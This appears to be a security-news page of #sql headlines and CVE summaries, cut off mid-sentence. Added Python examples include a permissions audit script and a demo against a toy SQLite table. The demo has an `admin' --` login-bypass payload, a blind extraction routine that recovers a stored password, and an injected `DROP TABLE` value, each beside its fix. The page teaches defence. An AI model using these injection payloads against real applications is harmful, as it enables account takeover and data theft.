Security Headlines

Tag: #sql
Simplephpscripts Simple CMS 2.1 SQL Injection

Simplephpscripts Simple CMS version 2.1 suffers from a remote SQL injection vulnerability.

Packet Storm
SQL injection flaw in billing software app tied to US ransomware infection

BillQuick customers blindsided by recently patched web security flaw

Africa sees increase in ransomware, botnet attacks – but online scams still pose biggest threat

Fraud is still the primary goal of cybercriminals operating across the continent, Interpol warns in latest market report

CVE-2021-37363: Gestionale Open - Free ERP management software for companies

An Insecure Permissions issue exists in Gestionale Open 11.00.00. A low privilege account is able to rename the mysqld.exe file located in the bin folder and replace it with a malicious file that would connect back to an attacking computer, giving system level privileges (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file. The application also has unquoted service path issues.

CVE-2021-37364: OpenClinic GA download | SourceForge.net

OpenClinic GA 5.194.18 is affected by Insecure Permissions. By default the Authenticated Users group has the modify permission on openclinic folders/files. A low privilege account is able to rename the mysqld.exe or tomcat8.exe files located in the bin folders and replace them with a malicious file that would connect back to an attacking computer, giving system level privileges (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service through the application, a restart of the computer triggers the execution of the malicious file. The application also has unquoted service path issues.
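Both advisories above describe one pattern: a service executable that runs as Local System sits in a directory the Authenticated Users group can modify, and the service path is unquoted. The script below is an added example, not code from either product or either advisory. It parses the output of `icacls <file>` for a service executable and the service's ImagePath, and flags both conditions; the install path, the `icacls` output and the ImagePath are constructed to resemble the advisories, not captured from a real host, and the list of low-privilege principals is an assumption you may need to extend. On a live system you would feed it the output of `icacls "<path>"` and the PathName column from `Get-CimInstance Win32_Service`.

```python
import re

# Assumed list of principals that every logged-on low-privilege user belongs to.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
    r"builtin\users",
}
# icacls right tokens that allow overwriting, deleting or replacing the file.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "DC"}
# icacls tokens that describe inheritance rather than rights.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([^)]*\))+)\s*$")

def parse_icacls(path, output):
    """Parse `icacls <path>` output into [(principal, rights_set, is_deny), ...].

    The first line repeats the file name before the first ACE; later ACEs are
    indented.  `path` must be the file name exactly as it was passed to icacls.
    """
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.lower().startswith("successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group("flags"))
        is_deny = "DENY" in tokens
        rights = {t for tok in tokens for t in tok.split(",")
                  if t not in INHERIT_FLAGS and t != "DENY"}
        entries.append((m.group("principal"), rights, is_deny))
    return entries

def writable_by_low_priv(entries):
    """Grant ACEs that let a low-privilege principal modify the binary."""
    return [(p, sorted(r & WRITE_RIGHTS)) for p, r, deny in entries
            if not deny and p.lower() in LOW_PRIV_PRINCIPALS and r & WRITE_RIGHTS]

def unquoted_path_candidates(image_path):
    """Executables CreateProcess would try, in order, before the real one when
    an unquoted ImagePath contains spaces.  Empty list means not vulnerable."""
    if image_path.startswith('"'):
        return []
    end = image_path.lower().find(".exe")
    exe = image_path[: end + 4] if end != -1 else image_path
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def audit(path, icacls_output, image_path):
    findings = []
    for principal, rights in writable_by_low_priv(parse_icacls(path, icacls_output)):
        findings.append("%s can modify %s (%s)" % (principal, path, ",".join(rights)))
    for cand in unquoted_path_candidates(image_path):
        findings.append("unquoted ImagePath: a file planted at %s would run instead" % cand)
    return findings

# Constructed sample data resembling the advisories (hypothetical install path;
# not real icacls output from either product).
SAMPLE_PATH = r"C:\Program Files\Gestionale Open\bin\mysqld.exe"
SAMPLE_ICACLS = SAMPLE_PATH + r""" NT AUTHORITY\Authenticated Users:(I)(M)
                                                BUILTIN\Administrators:(I)(F)
                                                NT AUTHORITY\SYSTEM:(I)(F)
                                                BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_IMAGE_PATH = SAMPLE_PATH + " --defaults-file=my.ini GOmysql"

if __name__ == "__main__":
    for finding in audit(SAMPLE_PATH, SAMPLE_ICACLS, SAMPLE_IMAGE_PATH):
        print("FINDING:", finding)
```

The ACL check is the one that matters for the two CVEs: the modify right on the executable is what lets a standard user swap in a binary that runs as SYSTEM at the next reboot. The unquoted-path check is separate and reports where a planted file would have to live; quoting the ImagePath fixes it, and a reboot is the trigger for both.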

CVE-2021-26609: KrCERT/CC - KISA Internet Bohonara & KrCERT

A vulnerability was found in Mangboard (WordPress plugin). A SQL injection vulnerability was found in the order_type parameter. The order_type parameter makes a SQL query using unfiltered data. This vulnerability allows a remote attacker to steal user information.

CVE-2021-37371: Online Student Admission System in PHP Free Source Code | Free Source Code, Projects & Tutorials

Online Student Admission System 1.0 is affected by an unauthenticated SQL injection bypass vulnerability in /admin/login.php.
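The Mangboard and Online Student Admission System entries above are the two textbook shapes of SQL injection: quoted input reaching the WHERE clause of a login query, and a sort parameter (order_type) pasted into ORDER BY, where a bound parameter cannot be used and an allow-list of column names is the fix. The Python below is an added example against an in-memory SQLite table, not code from either project; the table, passwords and payloads are constructed. It shows the login bypass with `admin' --`, blind extraction of a password one character at a time through the sort parameter (the "steal user information" outcome), and the hardened version of each query.

```python
import sqlite3

def make_db():
    """Constructed sample data: a small users table in memory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "password TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "s3cret", "admin@example.test"),
        (2, "bob", "hunter2", "bob@example.test"),
        (3, "alice", "letmein", "alice@example.test"),
    ])
    return db

# --- login form: string concatenation vs. bound parameters -------------------

def login_vulnerable(db, username, password):
    # User input becomes part of the SQL text, so "admin' --" comments out the
    # password check and logs in as admin.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    # Placeholders bind the input as data; it can never change the query shape.
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None

# --- sort parameter: ORDER BY cannot be parameterised --------------------------

def list_users_vulnerable(db, order_type):
    # The request value is pasted straight into ORDER BY.
    return [r[1] for r in db.execute("SELECT id, username FROM users ORDER BY " + order_type)]

# Allow-list: request value -> fixed column name.  Anything else is rejected.
ALLOWED_ORDER = {"id": "id", "username": "username", "email": "email"}

def list_users_safe(db, order_type):
    if order_type not in ALLOWED_ORDER:
        raise ValueError("invalid order_type: %r" % order_type)
    return [r[1] for r in db.execute("SELECT id, username FROM users ORDER BY " + ALLOWED_ORDER[order_type])]

def leak_admin_password_prefix(db, guess):
    """Blind oracle through the sort column: when `guess` is a prefix of the
    admin password the rows come back ordered by id, otherwise by username."""
    payload = ("(CASE WHEN (SELECT password FROM users WHERE username = 'admin') "
               "LIKE '" + guess + "%' THEN id ELSE username END)")
    return list_users_vulnerable(db, payload) == list_users_vulnerable(db, "id")

def recover_admin_password(db, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=16):
    """Extend the known prefix one character at a time using the oracle."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            if leak_admin_password_prefix(db, known + ch):
                known += ch
                break
        else:
            break  # no character extends the prefix: the full value is recovered
    return known

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, "admin' --", "wrong"))
    print("safe login:      ", login_safe(db, "admin' --", "wrong"))
    print("leaked password: ", recover_admin_password(db))
    try:
        list_users_safe(db, "id; DROP TABLE users")
    except ValueError as exc:
        print("safe sort rejected:", exc)
```

The oracle only needs two differently ordered result sets, so it works even when the application never shows an error or any field from the users table; that is why an allow-list on the sort parameter is required rather than escaping. SQLite's LIKE is case-insensitive for ASCII, which is why the alphabet above is lowercase only.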

Hackers Exploited Popular BillQuick Billing Software to Deploy Ransomware

Cybersecurity researchers on Friday disclosed a now-patched critical vulnerability in multiple versions of a time and billing system called BillQuick that is being actively exploited by threat actors to deploy ransomware on vulnerable systems. The flaw, tracked as CVE-2021-42258, is an SQL injection that allows for remote code execution and was successfully